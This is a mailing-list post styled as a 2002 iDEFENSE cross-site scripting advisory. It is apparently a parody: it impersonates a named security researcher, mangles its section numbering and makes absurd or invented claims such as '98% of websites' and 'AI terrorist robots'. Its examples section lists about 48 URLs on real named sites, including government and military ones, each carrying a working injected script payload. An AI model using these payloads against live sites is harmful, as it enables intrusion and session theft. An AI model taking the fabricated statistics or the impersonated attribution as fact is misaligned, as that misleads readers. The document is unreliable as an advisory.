iDEFENSE Security Advisory 10.21.02: Cross-Site Scripting Holes present in virtually all websites

[David Endler<dendler () idefense com>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDEFENSE Security Advisory 10.21.02:
http://www.idefense.com/advisory/10.21.02.txt

i.  Cross-Site Scripting Holes present in virtually all websites/web-services.
ii. Fully-Automated XSS-exploiting AI anti-semite terrorist robots found in the wild.

Release Date : October 21, 2002


I. BACKGROUND

Cross-Site Scripting (hereafter referred to psuedo-acronymously as XSS) is a method of host and network intrusion 
pioneered by network security luminaries such as ZENOMORPH (zeno () cgisecurity net) and iDEFENSE's own DAVIDENDLER 
(dendler () idefense com). It is considered one of the top 10 threats to Internet and National Security and has 
resulted in numerous CERT, NIPC, FBI and SANS alerts. A XSS FAQ (authored by said luminaries) is available at 
http://www.cgisecurity.com/articles/xss-faq.shtml. 


David Endler (known in Blackhat circles as urlmazter[BoW/h4g1s/ac1db1tch3z/TMD/RaZoR]) writes the following on the 
subject of XSS:

"It seems today that Cross-Site Scripting (XSS) holes in popular web applications are being discovered and disclosed at 
an ever-increasing rate. Just glancing at the Bugtraq security mailing list archives over the first half of 2002 shows 
countless postings of XSS holes in widely used websites and applications. This new iDEFENSE Labs XSS paper predicts 
that fully and semi- automated techniques will aggressively begin to emerge for targeting and hijacking web 
applications using XSS, thus eliminating the need for active human exploitation. Some of these techniques are detailed 
along with solutions and workarounds for web application developers and users. It is available at 
http://www.idefense.com/XSS.html for download.

II. DESCRIPTION

iDEFENSE has determined that 98% of websites, especially those utilizing "scripts" or "active content", contain at 
least one passing-unfiltered-user-input-back-to-the-user-inside-html-page vulnerability that could lead to 
denial-of-service attacks against legitimate users, cookie and session theft, arbitrary html execution, malicious 
GIF/TIF injection, erroneous counter statistics, cross-frame spoofing (see idefense.com for details), crossed-bean java 
infection (see idefense.com for details), cross-img-src 1x1pixel web-bug injection and spoofing (see idefense.com for 
details), web-application muscle and nerve exhaustion attacks, and inappropriate or stalled/delayed 
fullscreen-pop-under banner-advertisement serving to opt-in users. 

In addition to the above discovery, it was noted that many search engines (hereafter referred to as "search engines") 
allow for rapid identification of potentially vulnerable sites. Coupled with widespread availability of email and 
newsgroup discussion services on the Internet, the dissemination of information regarding potential vulnerable servers 
is highly expediated. This allows the hacker community (hereafter referred to as 'skiddiotards') to broadcast their 
findings to their peers, which results in obscure domains and servers being targetted by large numbers of neophyte 
skiddiotards in a very short period of time.

III. IMPACT

The impact of an XSS attack should not be underestimated. It has been discovered that close to 90% of all identified 
XSS vulnerabilities allow an attacker to execute arbitrary HTML (and Javascript) code with the same privileges as a 
standard website. Put simply, an attacker taking advantage of a XSS-vulnerability can force unsuspecting users to 
display and/or execute webpages that they had not previously requested. This is equivalent to creating a malicious 
website, and enticing users to visit the page with an appropriate HTML browser client, or attaching said malicious HTML 
to an email message.

Technical Note 1: Many website operators rely on cookies and session ID's to identify and track their users.

IIIII. SOLUTION

Appropriate Anti-XSS Defense Mechanisms (ADMs) should be included in your organizational security policy. The iDEFENSE 
Site Security Standards Charter 2002 (iSSSC02) recommends a 2-layered approach encompassing both a technical and 
operational component to ensure maximum transparency and pro-activity. iDEFENSE is the worlds premier supplier of 
Anti-XSS defense software and consultancy services. For your free XSS Vulnerability Assessment Quote (iDEFXVAQ), please 
contact our sales, marketing and merchandising department at the number(s) listed below. 

III. EXAMPLES

The following sites and services have been found to be vulnerable to at least 1 (One) XSS (cross-site-scripting) 
vulnerability which may or may not lead to arbitrary webpage injection to website visitors, and stuff.

http://www.thecanadianteacher.com/cgi-bin/links/error.cgi?ID=483&title=</title><script>alert("iDEFENSE.COM");</script>
http://www.sinotrade.com.tw/ec/mo/show.asp?title=</title><script>alert("iDEFENSE.COM");</script>
http://internetwoordenboek.kennisnet.nl/inetwdb/show.asp?qu=<script>alert("iDEFENSE.COM");</script>
http://www.agnosia.com/html/albums-show.asp?cd=PappaResolution&title=<script>alert("iDEFENSE.COM");</script>
http://www.atsic.gov.au/tools/links_list.asp?Category=<script>alert("iDEFENSE.COM");</script>
http://www.cheshire.gov.uk/AtoZ/azdetails.asp?TextId=88&Title=<script>alert("iDEFENSE.COM");</script>
http://www.elearningpost.com/elthemes/addcomments.asp?theme=govlearn&title=<script>alert("iDEFENSE.COM");</script>
http://www.audit-commission.gov.uk/aboutus/what-london.asp?title=<script>alert("iDEFENSE.COM");</script>
http://www.parcomp-inc.com/mpages/x_SAV19Y5XY.asp?title=";><script>alert("iDEFENSE.COM");</script>
http://home.nauticom.net/main%20subs/about.asp?title=</title><script>alert("iDEFENSE.COM");</script>
http://www.uch.edu/content/aboutus/content.asp?index=AboutUsDocs&title=<script>alert("iDEFENSE.COM");</script>
http://www.info4local.gov.uk/singleLink.asp?linkId=1594&heading=<script>alert("iDEFENSE.COM");</script>
http://www.goarticles.com/cgi-bin/search.cgi?c=52&title=<script>alert("iDEFENSE.COM");</script>
http://www.b2bautosalvage.com/oldrep/exch_1031.cfm?inv_id=<script>alert("iDEFENSE.COM");</script>&inv_id_2=1
http://tcc.comptia.org/certification_detail.cfm?CERTIFICATIONID='hacker'&TITLE=<script>alert("iDEFENSE.COM");</script>
http://form-engine.com/help.asp?chapter=FAQ&title=<script>alert("iDEFENSE.COM");</script>
http://www.apcity.org/en_apcity/en_soluti/en_soluti_4.jsp?Title=<script>alert("iDEFENSE.COM");</script>
http://www.sergey.com/cgi-bin/get.cgi?show=l_sec&title=hi</title><script>alert("iDEFENSE.COM")</script>
http://www.trabucocanyon.com/local_Contacts.cfm?title=<script>alert("iDEFENSE.COM")</script>
http://www.biola.edu/admissions/actions/process_favorites.cfm?title=<script>alert("iDEFENSE.COM")</script>
http://laissezfairebooks.com/search-results.cfm?title=<script>alert("iDEFENSE.COM")</script>
http://cybrary.uwinnipeg.ca/resources/e-journals/Action-2.cfm?Title=<script>alert("iDEFENSE.COM")</script>
http://www.geocrawler.com/mail/thread.php3?subject=</title><script>alert(document.body);</script>
http://www.iww.uni-karlsruhe.de/cgi-bin/webmail?to=izv4&subject=";><script>alert("iDEFENSE.COM")</script>
http://www.touchv.com/cgi-bin/webmail.cgi?to=";><script>alert("iDEFENSE.COM")</script>
http://www.nibbleguru.com/cgi-bin/refer.cgi?ID=97&title=</title><script>alert("iDEFENSE.COM")</script>
http://www.findwebspace.com/glossary/glossary.asp?text=<script>alert("iDEFENSE.COM")</script>
http://www.worldsmine.com/cgi-bin/search.cgi?keywords=<script>alert("iDEFENSE.COM")</script>
http://www.cast.org/teachingeverystudent/ideas/print.cfm?name=<script>alert("iDEFENSE.COM")</script>
http://nas.nawcad.navy.mil/qol/mwr/text/index.cfm?page=<script>alert("iDEFENSE.COM")</script>
http://www.delphipages.com/resume/resume.cfm?ID=300<script>alert("iDEFENSE.COM")</script>
http://www.jerkoftheweek.com/archivetemplate.cfm?date=<script>alert("iDEFENSE.COM")</script>
http://www.collegefortexans.com/cfbin/tofa2.cfm?ID=<script>alert("iDEFENSE.COM")</script>
http://www.chickenchow.com/product.cfm?id=106&apos;<script>alert("iDEFENSE.COM")</script>
http://www.cyberforum.com.br/forum-section.cfm?ID=<script>alert("iDEFENSE.COM")</script>
http://www.horsesmidwest.com/photoad_detail.cfm?ID=<script>alert("iDEFENSE.COM")</script>
http://www.cecer.army.mil/td/tips/product/details.cfm?ID=<script>alert("iDEFENSE.COM")</script>
http://www.swt.usace.army.mil/~news/NewsDetail.CFM?ID=188<script>alert("iDEFENSE.COM")</script>
https://www.afml.ft-detrick.af.mil/afmlo/FAQ/FAQ_Detail.cfm?ID=11<script>alert("iDEFENSE.COM")</script>
http://www.navylearning.navy.mil/help/index.cfm?KEYPAGE=VIEWHELP&ID=<script>alert("iDEFENSE.COM")</script>
http://www.norva.navy.mil/navosh/course3fy02.cfm?ID=<script>alert("iDEFENSE.COM")</script>
http://www.vis-security.com/projects/sec-projects.cfm?catid=2<script>alert("iDEFENSE.COM")</script>
http://www.happyflying.com/print_story.cfm?ID=15<script>alert("iDEFENSE.COM")</script>
http://www.greenbackedheron.com/id.cfm?setid=<script>alert("iDEFENSE.COM")</script>
http://www.sexualhealth.com/questions/read.cfm?ID=69<script>alert("iDEFENSE.COM");</script>
http://www.pga.com/Newsline/Tour_News/tournews_detail.cfm?ID=9755<script>alert("iDEFENSE.COM")</script>
http://www.screensaver.com/ScreensaverLibrary.cfm?ID=<script>alert("iDEFENSE.COM")</script>
http://btob.barnesandnoble.com/btbrecommended.asp?title=<script>alert("iDEFENSE.COM");</script>&CATID=96&sourceid=0039357117&btob=Y

Technical Note 2: all of these vulnerable sites were found using www.alltheweb.com "search inside URL" advanced "search 
engine" feature. Only by blocking access to such "search engine" features can a site administrator reduce the number of 
potential XSS attacks originating from his or her domain.

Technical Note 3: almost all the .cfm boxes listed above are also vulnerable to SQL injection. This was not tested by 
iDEFENSE as some of these servers are in the .mil TLD-domain and SQL injection probes could be interpreted as an act of 
war.

IIII. CREDIT

iDEFENSE wishes to thank the following people for their contributions to this advisory and to the study of XSS attack 
and defence methods:

Zeno Morph (zeno () cgisecurity net)
Michael Sutton (msutton () idefense com)
Jeremiah Grossman (jeremiah () whitehatsec com)
Lex Arquette (lex () whitehatsec com)
Ulf Harnhammar (ulfh () update uu se)

IVI. SOLUTION

Please visit the following websites for more information on cross-site-scripting (XSS) and computor security:

"Cross-site scripting tears holes in Net security"
http://www.usatoday.com/life/cyber/tech/2001-08-31-hotmail-security-side.htm

Article on XSS holes
http://www.perl.com/pub/a/2002/02/20/css.html

"CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests"
http://www.cert.org/advisories/CA-2000-02.html

Paper on Removing Meta-characters from User Supplied Data in CGI Scripts.
http://www.cert.org/tech_tips/cgi_metacharacters.html

Paper on Microsoft's Passport System
http://eyeonsecurity.net/papers/passporthijack.html

Paper on Cookie Theft
http://www.eccentrix.com/education/b0iler/tutorials/javascript.htm#cookies

The webappsec mailing list (Visit www.securityfocus for details)
webappsec () securityfocus com



!!!!!!!!!!!!!! Get paid for security research !!!!!!!!!!!11

http://www.idefense.com/contributor.html

!!!!!!!!!!!!!! Subscribe to iDEFENSE Advisories: !!!!!!!11

send email to listserv () idefense com, subject line: "subscribe"




- -dave

David Endler, CISSP
Director, Technical Intelligence
iDEFENSE, Inc.
14151 Newbrook Drive
Suite 100
Chantilly, VA 20151
voice: 703-344-2632
fax: 703-961-1071

dendler () idefense com
www.idefense.com

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1.2
Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x4B0ACC2A

iQA/AwUBPZnxEErdNYRLCswqEQLrkACdHdU6cpv+NEzsJPi4ZZQxe2iy2NkAoKn0
ddyu8Js8PWZ/LMCNh+hYejfz
=CEof
-----END PGP SIGNATURE----- 
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html